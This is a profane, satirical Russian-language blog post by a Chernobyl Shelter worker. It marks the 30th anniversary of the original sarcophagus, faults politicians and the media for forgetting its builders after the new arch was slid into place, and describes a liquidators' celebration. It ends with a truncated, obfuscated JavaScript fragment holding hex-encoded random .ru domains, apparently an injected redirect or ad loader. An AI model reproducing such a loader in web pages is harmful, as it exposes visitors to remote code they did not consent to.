Мобильная версия сайта Главная страница » Блоги » Блог Oleg_Fedorenko » В свете прожекторов не видны звезды


В свете прожекторов не видны звезды

1 Декабря 2016 12:22   Просмотров: 3615
Метки: Чаэс, 30-летие объекта "укрытие"
Нравится Рейтинг поста: + 1
"Звезды – это души ушедших людей. 
Они светят тем, кто их помнит" 



30-летие объекта "Укрытие"
постиг "эффект черной дыры", который проявляется в том, что событие, о котором не поведали по телевизору и в печатных СМИ, не то что вообще перестает существовать, но однозначно теряет статус общественно значимого…   

А теперь запасайтесь попкорном, ибо сегодня автор напалма жалеть не будет, стараясь разобраться в вопросе: почему свиньям, толпящимся у корыта, звезды на небе без интересу? 


 
 
Проблему Чернобыля политики снимают с повестки дня 
 
Забавно, но факт: 30 ноября в телевизионных выпусках новостей об очередном юбилее сооружения "Укрытия" №1 даже словом не обмолвились. Тогда как в России об этой славной дате и подвиге строителей "Саркофага" вчера таки вспоминали:
 

Понятно, что вчерашний юбилей старого "Саркофага" оказался в тени позавчерашнего внимания украинских СМИ к торжествам по случаю надвижки "Арки". 


Но что-то в тех телерепортажах и речах с трибун лично я в упор не обнаружил внимания к создателям Укрытия №1.   

Так что "тренды дня" очевидны: после надвижки НБК (Нового Безопасного Конфайнмента) на старый "Саркофаг" про все явные и скрытые проблемы Чернобыля власти постараются забыть наглухо, переключив внимание общественности на якобы более актуальные "вызовы дня".   

Но поскольку это не снимает, собственно, самой проблемы приведения радиоактивного содержимого 4-го блока в более безопасное состояние, то подобное отношение со стороны современных политиков свидетельствует о том, что решение имеющихся проблем Чернобыля тупо спихивают на плечи будущих поколений.   

Что касается еще живых героев Чернобыля, то им власть послала достаточно внятный месседж: "Всем спасибо! Все свободны!" 
 

В чем принципиальная разница между двумя датами 1986 года? 
 
Вообще-то даже не все станционники способны внятно ответить на вопрос: в чем принципиальная разница между датой "26 апреля 1986 года" и "30 ноября 1986 года" – хотя эти две даты наполнены диаметрально разными смыслами и эмоциями.   

Если дата дня аварии на 4-м блоке – наполнена драматизмом и скорбью, то дата "30 ноября 1986 года" – наоборот, наполнена позитивным зарядом Дня Победы в эпической битве. 

26 апреля 1986 года профессионалы атомной энергетики, прямо скажем, облажались на весь мир. Причем не только перед современниками, но и в глазах всех остальных поколений человеческой цивилизации. 
 
А 30 ноября 1986 года, накрыв разрушенный аварией 4-й блок ЧАЭС, профессионалы чуточку реабилитировались. Доказав всему миру, что специалисты способны не только создавать феерические проблемы, но и решать такие задачи, которые, казалось бы, были по плечу исключительно героям древних мифов. 

И тот факт, что в 30 ноября 2016 года политики даже не вспомнили героев Чернобыля, соорудивших "Укрытие" №1, однозначно свидетельствует о попытке предать их трудовой подвиг забвению. 
 
Жопа – всем голова! 
 
Почему старые ликвидаторы скучают по периоду ликвидации последствий аварии? Вообще-то скучают они вовсе не трудностям и повышенным дозам внешнего облучения, а по той рабочей обстановке, в которой не было место руководящему долбоебизму. И когда служебные карьеры делались на реальной работе, а не на холуйстве.   

Затем постепенно все вернулось на круги своя и пошла прежняя шняга, когда на работу идешь, путь и не как на каторгу, но без особого энтузиазма.   

Уверяю вас, что если бы мировое сообщество исправно выделяло финансовые средства на решение проблем Чернобыля под процесс, а не под конкретные результаты, то "Укрытие" №2 мы бы вообще никогда не построили. 

Как ни крути, но получается, чтобы в коллективе создалась нормальная рабочая обстановка, сначала в стране должна возникнуть эпическая жопа.   

Это типа намек, что нынешнее руководство страны вектор движения держит именно в этом направлении. Так что есть надежда, что скоро крысам придется "ставать на крыло", тикая с корабля, как и предыдущее руководство.…   

 
 
Я б в фотографы пошел, пусть меня научат! 
 
Однако вернемся в 29 ноября и двум торжественно-праздничным мероприятиям: 
- одно из которых проходило в локальной зоне объекта "Укрытие" и широко освещалось всеми СМИ Украины, 


 
- а второе состоялось в "оздоровительно-бухательном комплексе" под Славутичем, которое известно аборигенам под названием "Баня "Хуторок". И которое прошло практически при полном отсутствии представителей средств массовой информации (за исключением автора), что, с одной стороны, хорошо – ибо это спасло зрителей от трешевого зрелища 12 голых мужиков, неспешно выпивающих семь часов кряду. А с другой стороны – отсутствие конкурентов еще лучше, ибо, как ни крути, а данный материал является эксклюзивным. 

На первый взгляд, между участниками первого и второго мероприятия нет прямой логической связи. А на второй – тем более, ибо если на официальном торжестве собрались граждане, большинство из которых объект "Укрытие" имело счастие видеть только издалека, то здесь собрались профессионалы, которые разрушенный 4-й блок и подкровельное пространство "саркофага" знают также подробно, как гинеколог внутреннее устройство женщин. 

А знаете – в чем принципиальная разница между обычным мужчиной и гинекологами? В том, что первых тайны внутреннего устройства женщин возбуждают, а вторых -- отнюдь, ибо профессионалы всеми этими, так сказать, глубинами и изюминками, сыты по горло. И любой спец вам "даст зуб", что снаружи женщины выглядят более фотогенично, чем изнутри.  
Не буду говорить от имени всех коллег, но лично я чувствую себя даже не столько гинекологом, сколько урологом, ибо внутренности 4-го блока – это просто мрачная жопа. 

Боюсь, что "сталкеры" фоткающие ОУ снаружи, вообще не понимают – о чем идет речь? Это знают только украинские рабочие, которые работали в помещения 4-го блока, возводя разделительные стены.   

Пользуясь случаем, выражу им огромным респект. Я уж было подумал, что у нас все настолько деградировало, что матерых рексов совсем не осталось. Ан нет! Не перевелись еще в обществе "Трудовые резервы" столь лютые кадры, которые способны без соли загрызть любого черта вместе с копытами и рогами.   

Кстати, о сталкерах. Один из "бугров" (бригадиров подрядной организации) смеясь, рассказал случай, когда один из новичков после первой рабочей смены в машзале 4-го блока сначала попросил себе набить на руке наколку "Сталкер", а затем тут же уволился, заявив, что хватит с него впечатлений. 
 
- Это боевой корабль "Композитор Юрий Шестакович"! 
- А почему "Юрий"? 
- А как? 
- Дмитрий! 
- Стоп. Нет! Конечно, Юрий. Я его сам на воду спускал…
(к/ф "День радио") 


Свои впечатления от телерепортажей с торжественного мероприятия номер один начну со следующего воспоминания: в старые добрые времена даже в штате малотиражных печатных изданий держали специально обученного человека, исправляющего чужие "косяки". 

Помнится, корректором одного черниговского издания была милая старушенция, которая прежде, чем приступить к вычитке поданных мною текстов, сразу требовала от редактора накапать ей в аптечный мерный стаканчик сто грамм коньяку -- дескать, это надбавка за вредность. 

Боюсь, доживи эта выпускница института благородных девиц до нынешних времен, то после просмотра первого встречного выпуска газеты или телерепортажа, она бы сходу выпила йаду, ибо грамматические ошибки встречаются сплошь и рядом даже в многотиражных газетах, а в телерепортажах низкий профессиональный уровень некоторых журналистов – заметен даже невооруженным взглядом.   

В общем, директор ЧАЭС Игорь Грамоткин еще должен сказать спасибо, что его обозвали Юрием, а не каким-нибудь Васей Пупкиным. 


Ну то, что "маржа" стоимости строительства "Арки" варьировалась в разных телерепортажах от полутора до двух миллиардов евро, то здесь я вообще не удивляюсь. Ибо полмиллиарда туда, полмиллиарда сюда – это ж вообще неважно…  
Неудивительно, что когда Нацбанк у вкладчиков всего двух банков "слямзил" два миллиарда долларов – то в Генпрокуратуре или Нацбюро по борьбе с коррупцией никто и ухом не почесал… 
 
Любителям режима "макро" свойственно не замечать слонов 
 
Покоробило слух высказывание из уст Петра Порошенко, что авария на ЧАЭС была де менее страшным испытанием для Украины, чем нынешняя российская агрессия. 

Понятно, что Петр Алексеевич пишет себе тексты не сам, но раз его не смутило то, что он прочитал с суфлера, то это является явным доказательством того – насколько далеко нынешнее политическое руководство страны от понимания сути масштабов чернобыльской аварии и тех проблем, которые не удается решить даже спустя тридцать лет после катастрофы.   
Политическое руководство Украины, прямо скажем, никогда не было сильно мудрым. Ибо и решение о строительстве в Украине станции с реактором РБМК, и решение о досрочном останове блоков ЧАЭС, которые могли снабжать страну электроэнергией еще долгие годы – принимали явно не профессионалы, представляющие все последствия подобных решений.   

И сегодня, когда руководители всех уровней публично заверяют общественность в том, что де в дальнейшем Украина сможет самостоятельно окончательно решить чернобыльскую проблему, то это, мягко говоря, неправда… 

*** 
 
Когда один журналистский репортаж с торжественного мероприятия по окончанию надвижки "Арки" на 4-й блок на канале ICTV начался с показа лошадей Пржевальского, то мне почему-то подумалось, что о матерых "зубрах Чернобыля", построивших первое "Укрытие", сегодня никто и не вспомнит. 



А ведь, слава Богу, живы еще и первый директор объект "Укрытие" Владимир Щербина, и Валентин Купный, возглавлявший ОУ с 1995 по 2002 годы. Это ведь именно эти профессионалы "пробивали своими лбами" все стены, добиваясь строительства "Укрытия" №2 и проведения мероприятий по стабилизации строительных конструкций первого "саркофага".


*** 
 
Указом Президента Украины №524/2016 "Про відзначення державними нагородами України" от 28.11.16 орденом "За заслуги" III степени было награждено 14 человек, а медалью "За працю і звитягу" -- целых восемь специалистов. 
 

Вот это по-нашему! С учетом того, что тем или иным боком к созданию "арки" напрямую причастно минимум тысяч десять народу, то получается, что наградами отметили аж 0,2%. Это ж просто какой-то фестиваль неслыханной щедрости! 
 

Медали, которые вручили двум руководителям далеко не последнего ранга, и на которых весь рабочий процесс, собственно, и держится – явно не по статусу. 

Увы, но абзац с рассказом об этих персоналиях пришлось удалить после реплики супруги: "Ага, вот ты сейчас их похвалил, а у них теперь могут быть неприятности! Вместо того, чтобы чьи-то фамилии упоминать, пошел бы лучше прикрутил в ванной полочку!". 

Так и живем: вместо того, чтобы открыто говорить о проблемах, сначала про себя материмся, а затем идем вешать полочки и переклеиваем обои. Ну это ж известная логическая схема: вместо того, чтобы критиковать руководство – проверь лучше у сына дневник! Можно подумать, что если чадо выучит наизусть стих, то у учителя станет больше зарплата, а тарифы на электричество наоборот снизятся. Или если с вечера я вынесу мусор, то наутро украинцам предоставят "безвиз"…   

Да-с, так вот, иностранным специалистам, которые в Украине получили такое бабло, которое на их родине им и не снилось – нам, значит, орденов не жалко, а украинских инженеров, получается, можно наградить и медальками. Аха, и шампанское подать им в пивных бокалах -- чай не баре во фраках… 

*** 
 
Не говорю уже о том, что простых работяг из украинских подрядных организаций, которые и делали самую грязную работу по демонтажу вентрубы и сооружению разделительных стен -- вообще обошли с наградами. Ну да, ну да – это ж не люди, а рядовые "псы монтажа".   

Не поверите, но рабочим из подрядных организаций даже премий не выписали. Ибо все "крошки с праздничного стола" подмели "сироты 2-го дома Старсобеса" – то бишь те паразиты, которые к конкретным работам как раз не были причастны…   

Между тем сами "рексы" УЭМа отметили собачку по кличке Лайма, которая каждый день провожала их на работу от СП1430 до входа в локальную зону, а затем радостно встречала, повесив ей на грудь наградной жетон.   

Если честно, то совершенно не жалко было бы спалить нахуй руководящих жлобов, которые к подчиненным относятся хуже, чем простые люди к бездомным собакам… 

*** 

В общем, не пора ли, панове, прекратить переводить латунь не по делу, ограничившись торжественным перечислением фамилий героев труда в твите Президента и пересылкой по "Новой почте" шоколадных медалей производства фабрики "Рошен"?! 

 
Как гуляют ликвидаторы генерации 2.0 
 
А теперь мысленно перенесемся из локальной зоны в ОУ в поселок Червона Гута, который находится в полутора километрах от Славутича. 
 

Празднование 30-летнего юбилея объекта "Укрытия" мы приурочили к 50-летнему юбилею коллеги, чтобы первый юбилей погулять за счет юбиляра. Что, согласитесь, несколько хитрожопо, но зато практично. 


  

Тостов была туча, а тем для разговоров -- хватило бы и на десять застолий. Как говорится, картина маслом: "Бойцы вспоминали минувшие дни".   

К слову, среди ликвидаторов тоже есть свои киборги, которые, собираясь вместе, подробно обсуждают – кто, где, какой и за сколько менял сустав или хрусталик глаза. Ну и свои приколы и подколки: типа что, жаба задавила сразу поставить хрусталик с функцией ночного видения?! 

*** 
 
И как же классно гулять за городом, где никого не смутят голые мужики, курящие в морозную ночь на улице, чтобы любоваться потрясающе звездным небом! 

Не знаю кого как, а меня по пьяне тянет на сентиментальную лирику в духе пассажей "Звезды – это души ушедших людей. Они светят тем, кто их помнит". 

Это ведь важно – помнить тех, кого с нами нет, не только "раз в год, два – в пятилетку", а постоянно отдавать себе отчет в том, что мы по жизни просто "несем эстафетную палочку", которую нам передали предыдущие поколения… 

*** 
 
Когда Порошенко, выступая перед присутствующими, сказал фразу "Yes, ми це зробили!", после которой глупо залыбился, то степень его личной причастности к сооружению "арки" напомнила мне народную поговорку "Мы пахали – я и трактор". 


По мнению припецков, Петя, сидя в кабинете, пашет, шо тот бульдозер фирмы "Komatsu", а работяги на 4-м блоке все эти годы тупо просирали бюджетные деньги. 

Ну а, ну да -- мы ж тут на ОУ "гоняем дурка" и на звездное небо любуемся. А окружающая среда на ОУ улучшилась настолько, что слово "радиация" в карте условий труда персонала объекта "Укрытие" вообще не звучит. 
 
И почему меня не удивляет, что Украина является единственной страной в мире, располагающей ядерными технологиями, но при этом не имеющая утвержденной методики оценки условий труда по радиационному фактору. И это через тридцать лет (!!!) аварии на ЧАЭС… 

Это не просто пиздеС, а просто мировой рекорд руководящего долбоебства… 
 
Руководителей Минздрава и Минсоцполитики следовало бы приковать цепями на "экологически чистой" кровле машзала 4-го блока до тех пор, пока они не утвердят вышеупомянутую методику. Уверяю, что эта работа была бы сделана за считанные часы. 

*** 
 
Забавно, но ни в одном из репортажей не прозвучало точное время окончания перемещения арки в проектное положение. То есть у зрителей и читателей может возникнут впечатление, что это историческое событие произошло именно 29 ноября.   
Раскрою секрет – надвижка "Арки" на 4-й блок была завершена еще 27 ноября в 17 часов 50 минут, когда несла боевое дежурство доблестная смена №5. Ну, кто еще представит читателям эксклюзивный пруф в виде исторической записи в оперативном журнале? 


Когда смена №1 утром 25 ноября покидала объект после ночной смены, то восточный торец "Арки" еще находился на уровне западного торца машзала 4-го блока. Затем, 26 ноября на дежурстве смены №4 конструкцию НБК сместили на 50 метров. На следующий день "Арку" сначала передвинули на 46 метров (к 12:45 по киевскому времени), а после паузы и на оставшиеся семь метров. 

Небольшие проблемы, кстати, были – в частности, в пожарном порядке пришлось срезать ограждения лестниц машзала, которые цеплялись за контуры арки.   

Знай, Украина, что начальником смены цеха эксплуатации ЦЭОУ в этот день был славный уроженец Полтавы Вадик Тернавский, а оператором – уроженец Умани Игорь Коленковский. 

*** 
 
Мы, нынешние представители цеха эксплуатации объекта "Укрытие", электроцеха, ЦТАИ и ЦРБ, являемся, так сказать, "хозяевами 4-го блока" поколения 2.0. То есть от первого состава работников ОУ уже практически никого не осталось. 

Но как раз много сыновей, которые пришли на смену своим отцам. Не все представители чаэсовской героической генерации 1.0 дожили до этого дня. Как отцы наших коллег: Киверов Александр Михайлович, работавший начальником смены блока на ОУ; Клепиков Василий Алексеевич, работавший начальником смены турбинного цеха. 

Возможно, даже не все коллеги еще знают, что в сентябре ушел из жизни Карпан Николай Васильевич, который, казалось, буквально вчера привозил журалистскую братию в Славутич для съемок документального фильма об объекте "Укрытие". 
 

А всего в Книге Памяти ЧАЭС числится свыше тысячи имен наших коллег…
 
*** 

Так что если на мероприятии №1 подвиг строителей "Саркофага" оказался в тени внимания к создателям "Арки", то у нас было как раз наоборот. 
 
Французы затратили 833 дня только на разработку проекта "Арки", несколько лет на сбор средств, а затем 4 года на монтаж конструкций. И теперь в течение года это нужно будет еще "довести до ума". 
 
Так что слава подвигу ликвидаторов аварии на 4-блоке ЧАЭС и настоящим мужчинам, сделавшим невозможное – в условиях смертельных полей радиации построившим защитное укрытие над разрушенным блоком всего за 206 дней. 
 

Как говорится, почувствуйте разницу!
window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="27924",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e
Добавить в:


ЦентрКомплект